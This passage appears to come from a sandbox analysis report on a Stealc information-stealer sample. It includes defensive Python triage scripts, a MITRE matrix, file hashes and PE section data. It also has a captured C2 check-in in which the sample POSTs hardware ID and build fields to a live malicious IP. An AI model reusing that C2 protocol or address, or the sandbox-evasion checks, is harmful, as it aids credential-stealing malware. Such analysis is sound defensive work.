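    return windows, devices, values, vbox


if __name__ == "__main__":
    for line in classify(*probe()) or ["none of the listed artifacts is exposed"]:
        print(line)
```

                Every finding is something the sample can see from user mode without any privilege, so a VM that prints a line here will be fingerprinted before the stealer does anything worth recording.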

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara match | File source: Process Memory Space: file.exe PID: 7400, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00359600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00359600
                Source: file.exe | Binary or memory string: ["kProgram Manager
                Source: file.exe, 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: ["kProgram Manager
                Source: C:\Users\user\Desktop\file.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00357B90
                Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00356920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00356920
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00357850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00357850
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00357A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00357A30
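                The "Code function" entries in this report (the FindFirstFileA/PathMatchSpecA/CopyFileA loops in the evasion section, the CreateToolhelp32Snapshot loop and the GetKeyboardLayoutList/GetLocaleInfoA check above) are easy to turn into capability hits when many reports have to be triaged. The following Python is an added example, not code from the report: the sample lines are copied from this page, while RULES and the GetProcAddress threshold are this example's own mapping and assumptions, not a Joe Sandbox or capa rule set.

```python
"""Map Joe Sandbox "Code function" API chains to capabilities.

Added example, not part of the report. SAMPLE_LINES are copied from the
report's signatures; RULES and DYNAMIC_RESOLUTION_MIN_CALLS are this
example's own assumptions.
"""
import re
from collections import Counter

SAMPLE_LINES = [
    "Code function: 0_2_003538B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_003538B0",
    "Code function: 0_2_00359600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00359600",
    "Code function: 0_2_00359860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00359860",
    # This form has no leading address; the report prints only the trailing one.
    "Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00357B90",
    "Code function: 0_2_00357A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00357A30",
]

# A rule fires when every API in its set appears somewhere in the function's chain.
RULES = {
    "file-grabber":         {"FindFirstFileA", "FindNextFileA", "PathMatchSpecA", "CopyFileA"},
    "process-enumeration":  {"CreateToolhelp32Snapshot", "Process32First", "Process32Next"},
    "locale-check":         {"GetKeyboardLayoutList", "GetLocaleInfoA"},
    "timezone-fingerprint": {"GetTimeZoneInformation"},
}
# Assumed threshold: this many GetProcAddress calls plus LoadLibraryA in one function.
DYNAMIC_RESOLUTION_MIN_CALLS = 8

# <pid-index>_<stage>_<8 hex digits>, optionally before the chain, always after it.
LINE_RE = re.compile(
    r"Code function:\s*(?:(?P<addr>\d+_\d+_[0-9A-Fa-f]{8})\s+)?"
    r"(?P<apis>.*?),?(?P<tail>\d+_\d+_[0-9A-Fa-f]{8})\s*$"
)


def parse_line(line):
    """Return (function address, [API names in call order]) or None if not a code-function line."""
    m = LINE_RE.search(line)
    if not m:
        return None
    apis = [a for a in m.group("apis").split(",") if a]
    return m.group("addr") or m.group("tail"), apis


def capabilities(apis):
    """Capability names for one API chain, in RULES order, threshold rule last."""
    calls = Counter(apis)
    hits = [name for name, needed in RULES.items() if needed.issubset(calls)]
    if calls["GetProcAddress"] >= DYNAMIC_RESOLUTION_MIN_CALLS and calls["LoadLibraryA"]:
        hits.append("dynamic-api-resolution")
    return hits


def triage(lines):
    """{function address: [capabilities]} for every parsable line."""
    out = {}
    for line in lines:
        parsed = parse_line(line)
        if parsed:
            addr, apis = parsed
            out[addr] = capabilities(apis)
    return out


if __name__ == "__main__":
    for addr, caps in triage(SAMPLE_LINES).items():
        print(addr, ", ".join(caps) or "-")
```

                Feeding the whole signature section through triage() gives a per-function capability map that can be diffed between samples from the same C2, which is more useful than the flat signature list when deciding whether a new upload is the same build.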

                Stealing of Sensitive Information

                Source: Yara match | File source: 0.2.file.exe.340000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.1705479023.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1746396519.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: file.exe PID: 7400, type: MEMORYSTR
                Source: Yara match | File source: dump.pcap, type: PCAP

                Remote Access Functionality

                Source: Yara match | File source: 0.2.file.exe.340000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.1705479023.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1746396519.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: file.exe PID: 7400, type: MEMORYSTR
                Source: Yara match | File source: dump.pcap, type: PCAP
                MITRE ATT&CK matrix (number in parentheses = matching signatures; techniques without a number are matrix placeholders with no signature match)

                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
                Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
                Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
                Execution: Command and Scripting Interpreter (2); Native API (11); At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
                Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
                Privilege Escalation: Process Injection (11); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
                Defense Evasion: Masquerading (1); Virtualization/Sandbox Evasion (33); Disable or Modify Tools (11); Process Injection (11); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (4); Software Packing (12); DLL Side-Loading (1)
                Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
                Discovery: System Time Discovery (2); Security Software Discovery (651); Virtualization/Sandbox Evasion (33); Process Discovery (13); Account Discovery (1); System Owner/User Discovery (1); File and Directory Discovery (1); System Information Discovery (324)
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
                Collection: Archive Collected Data (1); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
                Command and Control: Encrypted Channel (2); Ingress Tool Transfer (2); Non-Application Layer Protocol (2); Application Layer Protocol (12); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
                Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
                Source | Detection | Scanner | Label
                file.exe | 100% | Avira | TR/Crypt.TPM.Gen
                file.exe | 100% | Joe Sandbox ML |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                Source | Detection | Scanner | Label
                http://185.215.113.37/ | 100% | URL Reputation | malware
                http://185.215.113.37 | 100% | URL Reputation | malware
                http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware
                No contacted domains info
                Name | Malicious | Antivirus Detection | Reputation
                http://185.215.113.37/ | true | URL Reputation: malware | unknown
                http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware | unknown
                Name | Source | Malicious | Antivirus Detection | Reputation
                http://185.215.113.37= | file.exe, 00000000.00000002.1746396519.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/e2b1563c6670f193.php= | file.exe, 00000000.00000002.1746396519.0000000001011000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37 | file.exe, 00000000.00000002.1746396519.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
                http://185.215.113.37/e2b1563c6670f193.php? | file.exe, 00000000.00000002.1746396519.0000000000FF7000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/e2b1563c6670f193.php6 | file.exe, 00000000.00000002.1746396519.0000000000FF7000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/e2b1563c6670f193.phph | file.exe, 00000000.00000002.1746396519.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                IP | Domain | Country | ASN | ASN Name | Malicious
                185.215.113.37 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1540694
                          Start date and time:2024-10-24 01:09:04 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 3m 4s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of new started processes analysed:1
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:file.exe
                          Detection:MAL
                          Classification:mal100.troj.evad.winEXE@1/0@0/1
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 80%
                          • Number of executed functions: 19
                          • Number of non-executed functions: 86
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Stop behavior analysis, all processes terminated
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • VT rate limit hit for: file.exe
                          No simulations
                          Match | Associated Sample Name / URL | Detection | Threat Name | Context
                          185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                          185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                          185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                          185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                          185.215.113.37 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                          185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                          185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                          185.215.113.37 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.37/e2b1563c6670f193.php
                          185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                          185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                          No context
                          Match | Associated Sample Name / URL | Detection | Threat Name | Context
                          WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                          WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
                          WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                          WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                          WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 185.215.113.16
                          WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                          WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                          WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.16
                          WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
                          WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                          No context
                          No context
                          No created / dropped files found
                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):7.9473200177433245
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.96%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:file.exe
                          File size:1'809'408 bytes
                          MD5:c85bd4b2ad207a44d2cf47f0b48d6d09
                          SHA1:3d20ea5592b7742bf5a05c166aa3e18c9d187681
                          SHA256:294ee8a1545ecad7c74a8994fd7cd56acbdf3694ee80a77ba33e12c0067717d7
                          SHA512:6933e4ebf98f4644c608658a5f635e7ad7a17d8d7fb4b189397872729bf5f5e200cf79674710637a40abdfc4beb3599dc6e53852815acfcf435a866acb56ff2e
                          SSDEEP:49152:w7LFTRV5omRHDLvgrjo1Q9862KWDRknjzBY0:w7xd4svgPI7oqkZY0
                          TLSH:FA8533F41EF0B95ACC1B9EFD8153964980B147BC5F68CF2C55B1A62D883EA87D83246C
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
                          Icon Hash:90cececece8e8eb0
                          Entrypoint:0xa84000
                          Entrypoint Section:.taggant
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                          Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:5
                          OS Version Minor:1
                          File Version Major:5
                          File Version Minor:1
                          Subsystem Version Major:5
                          Subsystem Version Minor:1
                          Import Hash:2eabe9054cad5152567f0699947a2c5b
                          Instruction
                          jmp 00007FCA94EE07DAh
                          Programming Language:
                          • [C++] VS2010 build 30319
                          • [ASM] VS2010 build 30319
                          • [ C ] VS2010 build 30319
                          • [ C ] VS2008 SP1 build 30729
                          • [IMP] VS2008 SP1 build 30729
                          • [LNK] VS2010 build 30319
                          Name | Virtual Address | Virtual Size | Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
                          IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
                          IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                          Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                          (no name) | 0x1000 | 0x25b000 | 0x22800 | b2d336d7bd9d535e12b689ac649ce19b | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          (no name) | 0x25e000 | 0x291000 | 0x200 | bf9a427ef0d2ac8c2d12b6ca993a6f46 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          xisdcata | 0x4ef000 | 0x194000 | 0x193a00 | 03cc6eca5bf5492f3690a7798a0ec282 | False | 0.9949372386961908 | data | 7.953663128653993 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          bazuxvkp | 0x683000 | 0x1000 | 0x400 | 5237d2fe741be60f0d49a40042cde6c0 | False | 0.822265625 | data | 6.33729039656592 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .taggant | 0x684000 | 0x3000 | 0x2200 | 1a41df39d7ac59eec5b62f4b57279ee7 | False | 0.06767003676470588 | DOS executable (COM) | 0.7790813178297834 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
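                          The header and section table above account for several of the headline signatures (entry point outside standard sections, section with special characters, packed sections). The following Python is an added example, not from the report or from any PE library: it embeds the values printed above and applies a few triage heuristics whose thresholds (which section names count as conventional code sections, the entropy cut-off, the virtual-to-raw size ratio) are assumptions. With a real file the same fields can be read with pefile; it is not used here so that the block runs offline on the report's numbers.

```python
"""Why the report flags the entry point and sections of file.exe.

Added example, not from the report. IMAGE_BASE, ENTRY_POINT and SECTIONS are
copied from the PE information in the report; the heuristics and thresholds
below are the author's triage rules and are assumptions.
"""
IMAGE_BASE = 0x400000
ENTRY_POINT = 0xA84000  # the report prints the entry point as a virtual address

RWX = "IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE"
RW = "IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE"

# (name, RVA, virtual size, raw size, entropy or None where the report says "unknown", characteristics)
SECTIONS = [
    ("",         0x1000,   0x25B000, 0x22800,  None,               RWX),
    (".rsrc",    0x25C000, 0x1000,   0x0,      0.0,                RW),
    (".idata",   0x25D000, 0x1000,   0x200,    0.9064079259880791, RW),
    ("",         0x25E000, 0x291000, 0x200,    None,               RWX),
    ("xisdcata", 0x4EF000, 0x194000, 0x193A00, 7.953663128653993,  RWX),
    ("bazuxvkp", 0x683000, 0x1000,   0x400,    6.33729039656592,   RWX),
    (".taggant", 0x684000, 0x3000,   0x2200,   0.7790813178297834, RWX),
]

CONVENTIONAL_CODE_SECTIONS = {".text", "CODE", ".code"}  # assumption
HIGH_ENTROPY = 7.5                                       # assumption: near-8 means encrypted/compressed
INFLATION_RATIO, INFLATION_MIN_VSIZE = 16, 0x10000       # assumption: unpacked into at load time


def label(sec):
    """Stable display name, since two sections here have an empty name."""
    name, rva = sec[0], sec[1]
    return f"{name or '<unnamed>'}@0x{rva:X}"


def section_for_rva(rva):
    """Name of the section whose virtual range contains rva, or None."""
    for sec in SECTIONS:
        _, start, vsize, rsize, _, _ = sec
        if start <= rva < start + max(vsize, rsize):
            return sec[0]
    return None


def triage():
    ep_rva = ENTRY_POINT - IMAGE_BASE
    ep_section = section_for_rva(ep_rva)
    return {
        "entry_rva": ep_rva,
        "entry_section": ep_section,
        "entry_outside_code": ep_section not in CONVENTIONAL_CODE_SECTIONS,
        # Writable and executable at once: the section is decrypted/patched in place.
        "rwx": [label(s) for s in SECTIONS
                if "IMAGE_SCN_MEM_EXECUTE" in s[5] and "IMAGE_SCN_MEM_WRITE" in s[5]],
        "unnamed": [label(s) for s in SECTIONS if not s[0]],
        "high_entropy": [label(s) for s in SECTIONS if s[4] is not None and s[4] >= HIGH_ENTROPY],
        # Large virtual size backed by little file data: the packer fills it at runtime.
        "runtime_inflated": [label(s) for s in SECTIONS
                             if s[2] >= INFLATION_MIN_VSIZE and s[2] >= INFLATION_RATIO * max(s[3], 1)],
    }


if __name__ == "__main__":
    for key, value in triage().items():
        print(f"{key:20} {value}")
```

                          The entry point resolves to 0x684000, the start of .taggant, and every section that is executable is also writable, which is what the unpacking signature (changes PE section rights) and the self-modifying-code interceptors above are reacting to at runtime.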
                          DLL | Import
                          kernel32.dll | lstrcpy
                          Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                          2024-10-24T01:10:02.998180+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | TCP
                          Timestamp | Source Port | Dest Port | Source IP | Dest IP
                          Oct 24, 2024 01:10:01.766046047 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
                          Oct 24, 2024 01:10:01.771348953 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
                          Oct 24, 2024 01:10:01.771429062 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
                          Oct 24, 2024 01:10:01.771707058 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
                          Oct 24, 2024 01:10:01.777004004 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
                          Oct 24, 2024 01:10:02.702789068 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
                          Oct 24, 2024 01:10:02.702877998 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
                          Oct 24, 2024 01:10:02.705238104 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
                          Oct 24, 2024 01:10:02.710542917 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
                          Oct 24, 2024 01:10:02.998061895 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
                          Oct 24, 2024 01:10:02.998179913 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
                          Oct 24, 2024 01:10:05.721029997 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
                          • 185.215.113.37
                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          0 | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | 7400 | C:\Users\user\Desktop\file.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Oct 24, 2024 01:10:01.771707058 CEST | 89 | OUT | GET / HTTP/1.1
                          Host: 185.215.113.37
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          Oct 24, 2024 01:10:02.702789068 CEST | 203 | IN | HTTP/1.1 200 OK
                          Date: Wed, 23 Oct 2024 23:10:02 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Content-Length: 0
                          Keep-Alive: timeout=5, max=100
                          Connection: Keep-Alive
                          Content-Type: text/html; charset=UTF-8
                          Oct 24, 2024 01:10:02.705238104 CEST | 412 | OUT | POST /e2b1563c6670f193.php HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----JJECGCBGDBKJJKEBFBFH
                          Host: 185.215.113.37
                          Content-Length: 211
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 45 43 47 43 42 47 44 42 4b 4a 4a 4b 45 42 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 45 38 37 31 34 44 39 39 42 30 32 31 32 32 35 36 38 36 33 31 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 43 47 43 42 47 44 42 4b 4a 4a 4b 45 42 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 43 47 43 42 47 44 42 4b 4a 4a 4b 45 42 46 42 46 48 2d 2d 0d 0a
                          Data Ascii:
                          ------JJECGCBGDBKJJKEBFBFH
                          Content-Disposition: form-data; name="hwid"

                          8E8714D99B021225686314
                          ------JJECGCBGDBKJJKEBFBFH
                          Content-Disposition: form-data; name="build"

                          doma
                          ------JJECGCBGDBKJJKEBFBFH--
                          Oct 24, 2024 01:10:02.998061895 CEST | 210 | IN | HTTP/1.1 200 OK
                          Date: Wed, 23 Oct 2024 23:10:02 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Content-Length: 8
                          Keep-Alive: timeout=5, max=99
                          Connection: Keep-Alive
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 59 6d 78 76 59 32 73 3d
                          Data Ascii: YmxvY2s= (base64 of the ASCII string "block")



                          Target ID:0
                          Start time:19:09:58
                          Start date:23/10/2024
                          Path:C:\Users\user\Desktop\file.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\file.exe"
                          Imagebase:0x340000
                          File size:1'809'408 bytes
                          MD5 hash:C85BD4B2AD207A44D2CF47F0B48D6D09
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1705479023.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1746396519.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true


                            Execution Graph

                            Execution Coverage:9%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:9.7%
                            Total number of Nodes:2000
                            Total number of Limit Nodes:24
